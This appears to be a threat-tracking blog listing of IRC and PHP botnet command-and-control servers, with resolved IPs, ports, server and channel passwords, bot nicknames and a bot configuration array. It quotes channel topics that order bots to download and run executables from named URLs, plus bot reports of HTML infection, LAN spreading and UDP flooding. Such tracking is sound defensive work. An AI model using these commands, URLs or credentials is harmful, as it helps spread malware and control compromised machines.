Author: Pig

kca.hopto.org(irc botnet hosted in Turkey Balikesir Turk Telekomunikasyon Anonim Sirketi)

Uncategorized

Resolved : [kca.hopto.org] To [88.255.116.48] Server: 88.255.116.48:1453 Nick: new[iRooT-XP-AUT]990453 Username: 9904 Server Pass: KCA Joined Channel: #XXX with Password KCA Channel Topic for Channel #XXX: “.dwl http://www.pso-k.org/yes.exe .lan .html” Private Message to Channel #XXX: “^C04[HTML Infector]: ^C09Html Files Infected!” Private Message to Channel #XXX: “[Download]: Executed Successfully” Private Message to Channel #XXX: “^C04[LAN Spread]: ^C09SpreadingRead more...

4.byinter.net(irc botnet hosted in Turkey Balikesir Turk Telekomunikasyon Anonim Sirketi)

Uncategorized

Resolved : [4.byinter.net] To [88.255.116.47] Download URLs http://72.32.8.40/iplocator.htm (www.geobytes.com) http://108.167.179.252/xxx.exe (www.grupobysoft.com) Outgoing connection to remote server: www.geobytes.com TCP port 80 C&C Server: 88.255.116.47:6667 Server Password: Username: TURKiSH Nickname: [N][DEU][XP][29218] Channel: #s (Password: KCA) #X, #XX, #XXX and #KCA Channeltopic: :!download http://www.grupobysoft.com/xxx.exe 1 hosting infos: http://whois.domaintools.com/88.255.116.47

brutinhoesilkster.servegame.com(Linux bots hosted in United States Dallas Limestone Networks Inc.)

Uncategorized

Resolved : [brutinhoesilkster.servegame.com] To [63.143.41.236] var $config = array(“server”=>”brutinhoesilkster.servegame.com”, “port”=>”443”, “pass”=>””, “prefix”=>”[BET][RLZ]”, “maxrand”=>”4”, “chan”=>”#betorlz”, “chan2″=>””, “key”=>””, “modes”=>”+iB-x”, “password”=>”betinho”, “trigger”=>”.”, “hostauth”=>”*” // Clients: I have 297 clients and 0 servers Local users: Current local users: 297 Max: 607 Global users: Current global users: 297 Max: 607 Now talking in #betorlz ([[BET][RLZ]2706) [UdpFlood Finalizado!]: 1687 MB enviadosRead more...

esta4.info(ngr botnet hosted in United States San Jose Serveryou.com – Oow)

Uncategorized

Resolved : [esta4.info] To [216.172.132.123] other domain names used from same guy: jer0002.in Resolved : [jer0002.in] To [216.172.132.123] jer0003.in Resolved : [jer0003.in] To [216.172.132.123] ratk01.com Resolved : [ratk01.com] To [216.172.132.123] Remote Host Port Number 199.15.234.7 80 216.172.132.123 1887 PASS powned NICK n{US|XPa}rqrrlpw USER rqrrlpw 0 0 :rqrrlpw JOIN #sbsb powned JOIN #XP JOIN #US NowRead more...